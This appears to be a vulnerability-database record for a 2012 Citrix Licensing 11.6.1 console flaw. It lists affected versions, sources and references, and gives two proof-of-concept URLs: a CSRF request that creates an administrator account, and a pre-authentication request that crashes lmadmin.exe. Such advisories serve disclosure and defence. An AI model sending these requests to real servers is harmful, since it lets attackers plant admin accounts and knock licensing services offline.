ID

VAR-E-201203-0268


EDB ID

36969


TITLE

Citrix 11.6.1 - Licensing Administration Console Denial of Service - Windows dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 36969

DESCRIPTION

Citrix 11.6.1 - Licensing Administration Console Denial of Service.. dos exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 36969

AFFECTED PRODUCTS

vendor:citrixmodel: - scope:eqversion:11.6.1

Trust: 1.0

vendor:citrixmodel:licensing buildscope:eqversion:11.6.110007

Trust: 0.3

vendor:citrixmodel:licensingscope:eqversion:11.6.1

Trust: 0.3

vendor:citrixmodel:licensingscope:eqversion:11.6

Trust: 0.3

vendor:citrixmodel:licensingscope:eqversion:11.5

Trust: 0.3

sources: BID: 52522 // EXPLOIT-DB: 36969

EXPLOIT

source: https://www.securityfocus.com/bid/52522/info

Citrix Licensing is prone to a denial-of-service vulnerability.

A remote attacker can leverage this issue to crash the affected application, denying service to legitimate users.

Citrix Licensing 11.6.1 build 10007 is vulnerable; other versions may also be affected.

Proof-of-Concept:
http://www.example.com/users?licenseTab=&selected=&userName=xsrf&firstName=xsrf&lastName=xsrf&password2=xsrf&confirm=xsrf&accountType=admin&originalAccountType=&Create=Save(Administrator CSRF)

http://www.example.com/dashboard?<something long here>=2 (pre auth DoS, crashes lmadmin.exe)

Trust: 1.0

sources: EXPLOIT-DB: 36969

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 36969

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 36969

TYPE

Licensing Administration Console Denial of Service

Trust: 1.0

sources: EXPLOIT-DB: 36969

CREDITS

Rune

Trust: 0.6

sources: EXPLOIT-DB: 36969

EXTERNAL IDS

db:EXPLOIT-DBid:36969

Trust: 1.9

db:BIDid:52522

Trust: 1.9

db:EDBNETid:58250

Trust: 0.6

sources: BID: 52522 // EXPLOIT-DB: 36969 // EDBNET: 58250

REFERENCES

url:https://www.exploit-db.com/exploits/36969/

Trust: 0.6

url:https://www.exploit-db.com/exploits/36969

Trust: 0.3

url:http://support.citrix.com/product/lic/

Trust: 0.3

url:http://support.citrix.com/article/ctx128167

Trust: 0.3

sources: BID: 52522 // EDBNET: 58250

SOURCES

db:BIDid:52522
db:EXPLOIT-DBid:36969
db:EDBNETid:58250

LAST UPDATE DATE

2022-07-27T09:45:25.307000+00:00


SOURCES UPDATE DATE

db:BIDid:52522date:2012-03-15T00:00:00

SOURCES RELEASE DATE

db:BIDid:52522date:2012-03-15T00:00:00
db:EXPLOIT-DBid:36969date:2012-03-15T00:00:00
db:EDBNETid:58250date:2012-03-15T00:00:00